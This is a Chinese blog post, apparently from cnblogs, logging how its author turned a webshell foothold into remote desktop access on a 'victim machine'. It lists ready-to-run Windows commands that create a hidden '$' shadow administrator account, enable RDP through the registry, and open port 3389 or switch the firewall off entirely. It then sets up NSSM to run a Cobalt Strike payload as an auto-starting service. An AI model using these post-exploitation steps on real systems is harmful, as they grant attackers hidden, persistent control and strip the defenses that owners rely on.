首页 > 系统相关 >webshell转远程桌面

webshell转远程桌面

时间:2024-07-04 09:02:05浏览次数:15  
标签:webshell NSSM 服务 3389 add 远程桌面 net

就在刚刚我成功的通过webshell跳到了远程桌面
下面记录一下拿下的过程
参考以下链接即可
添加用户(「渗透技巧」添加 administrator 影子用户-CSDN博客)[https://blog.csdn.net/Javachichi/article/details/129280873]
开启远程桌面端口(单独记录内网渗透时如何使用命令行允许远程访问+开启3389端口,并进行哈希传递进行远程桌面连接 - BattleofZhongDinghe - 博客园 (cnblogs.com))[https://blog.csdn.net/Javachichi/article/details/129280873]

添加用户:
net user username$ Passwd123 /add #添加一个普通用户
($符添加时 , 只是在 net user 中无法查看到当前用户 ,而在 net localgroup administrators 中是可以看到的)
net localgroup administrators username$ /add #添加到管理员组
net user && net localgroup administrators #用于查询有什么用户的命令

添加远程桌面端口:
1.受害机执行允许远程访问的命令
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2.受害机开启3389端口
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService
防火墙相关设置
以下二选一
1)防火墙开启3389端口(首选)
netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in action=allow protocol=TCP localport=3389
2)直接关掉防火墙
netsh advfirewall set allprofiles state off
3.查看3389是否开启
netstat -ano | findstr 3389

更多请见开头列出的两篇博客,这里只列出我试验过的命令

使用服务将cobaltstrike持久化:
要将批处理文件(.bat 文件)注册为服务并在 Windows 开机时自启动,你可以结合使用 NSSM(Non-Sucking Service Manager) 工具来实现。以下是详细步骤:

  1. 下载和安装 NSSM:
    o 访问 NSSM 官方网站 下载最新版本的 NSSM 工具。
    o 解压缩并将 nssm.exe 放置在一个方便访问的路径(例如 C:\nssm)。
  2. 打开命令提示符:
    o 以管理员身份运行命令提示符(或 PowerShell)。
  3. 使用 NSSM 创建服务:
    o 在命令提示符中,使用以下命令来创建服务。假设你的批处理文件路径为 C:\path\to\your\script.bat,并为服务取名为 YourServiceName:
    o nssm install YourServiceName "C:\path\to\your\script.bat" 1
  4. 配置 NSSM 设置:
    o 使用以下命令编辑服务的设置:
    o nssm edit YourServiceName
    o 在 NSSM 窗口的“Details”选项卡中,将服务的启动类型设置为“自动(Automatic)”,以确保服务在系统启动时自动启动。
  5. 验证服务是否自启动:
    o 重新启动计算机,查看服务管理器中的服务是否已经自动启动,并确保你的批处理文件按预期运行。

标签:webshell,NSSM,服务,3389,add,远程桌面,net
From: https://www.cnblogs.com/sesmof/p/18282871

相关文章

  • 解决 windows远程桌面报错“CredSSP加密数据库修正”
    在被远程的windows系统中执行以下步骤:win+r键-输入regedit回车找到路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters2.1CredSSP\Parameters如果不存在,右键System文件夹,选择“新建-项”,输入CredSSP,再右键CredSSP,新......
  • 玄机-第一章 应急响应-webshell查杀
    玄机-第一章应急响应-webshell查杀靶机账号密码rootxjwebshell1.黑客webshell里面的flagflag{xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shellgithub地址的md5flag{md5}3.黑客隐藏shell的完整路径的md5flag{md5}注:/xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完......
  • termsrv.dll 是实现 Windows 远程桌面服务的核心组件,它通过上述机制和功能,支持了在企
    远程桌面协议(RemoteDesktopProtocol,RDP)是由微软开发的一种专用协议,用于在网络上进行远程桌面会话和远程应用程序的访问。它允许用户从一个计算机(称为客户端)远程控制另一个计算机(称为服务器),而无需物理上位于服务器旁边。WindowsRDP的底层原理:客户端-服务器架构:客户端:用户......
  • Windows11家庭版如何使用远程桌面
     下载、安装从本文最上面的依赖下载RDPwrapv1.6.2文件(压缩包),并解压,文件构成大致如下:–install.bat安装RDPWrap–RDPCheck.exe在本地测试远程连接情况–RDPConf.exe设置远程桌面(也用于检查运行情况)–uninstall.bat卸载RDPWrap–update.bat在Github上检查更新......
  • webshell总结
    一、webshell概况1.webshell概念:经常有客户的网站碰到被上传小马和大马,这里的“马”是木马的意思,可不是真实的马。通常,攻击者利用文件上传漏洞,上传一个可执行并且能被解析的脚本文件,通过这个脚本来获得服务器端执行命令的能力,也就是我们经常听到的WebShell,而这个脚本文件就......
  • 远程桌面一键登录 winform
    RDPRemoteLoginPro\RDPRemoteLoginPro.csproj<ProjectSdk="Microsoft.NET.Sdk"><PropertyGroup><TargetFramework>net8.0-windows</TargetFramework><OutputType>WinExe</OutputType><AssemblyName&g......
  • 远程桌面提示"你的凭据不工作"解决方案
    这几天遇到用户名密码正确,但是使用远程桌面提示“你的凭据不工作”的问题,尝试了下面连接提到的方法,均未解决。https://www.cnblogs.com/wmxblog/p/17540648.html经过查找资料,发现是CredSSP的问题,有两个方案来解决这个问题。编辑远程桌面文件打开远程桌面,设置好信息以后,将其另......
  • CentOS 7 配置 VNC 远程桌面连接
    文章目录前言1.图形化桌面配置VNC远程连接1.1.安装VNC服务1.2.临时启用VNC远程连接1.2.1.单终端启用VNC远程连接1.2.2.多终端启用VNC远程连接1.3.开机自启动VNC服务实现远程连接1.3.1.设置以root用户身份远程连接1.3.2.设置以普通用户身份远程连接2.最小化......
  • 通过 HIDS 告警分析 webshell 行为
    准备漏洞环境1. 下载 vulhub 仓库gitclonehttps://github.com/vulhub/vulhub.git2.  修改 tomcat 弱口令漏洞环境配置vivulhub/tomcat/tomcat8/tomcat-users.xml将配置文件中的 user 和 password 修改为非弱口令3.  启动漏洞环境(根据实际 docker 环境......
  • 项目运维时,某用户通过RDP远程桌面连接服务器...任务管理器显示用户状态断开连接!记录运
    目录问题出现解决方式测试参考  今天处理项目运维问题,发现服务器任务管理器出现用户状态断开连接......问题出现项目运维时,某用户通过rdp远程桌面连接Windowsserver服务器时,出现服务器发布的进度计划无法执行,打开服务器任务管理界面出现用户状态断开连接标志,如下......